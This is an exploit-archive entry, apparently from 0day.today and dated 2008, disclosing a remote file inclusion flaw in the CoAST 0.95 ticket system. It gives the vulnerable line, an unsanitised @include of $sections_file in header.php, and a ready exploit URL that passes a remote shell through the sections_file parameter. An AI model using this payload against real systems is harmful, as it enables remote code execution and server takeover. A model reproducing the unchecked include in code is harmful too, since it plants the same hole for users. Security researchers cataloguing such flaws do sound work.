id: 3781
date: 09/26/2008
title: CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability
author: DaRkLiFe
cves: 

==============================================================
CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability
==============================================================


**************************************************************************************
Script   : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability

Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?


**************************************************************************************

The header.php.dist file exists and it has to be   renamed into header.php as given in instructions.

Vulberable : line 201 : <?php @include $sections_file; ?>

**************************************************************************************



#  0day.today [2023-03-22]  #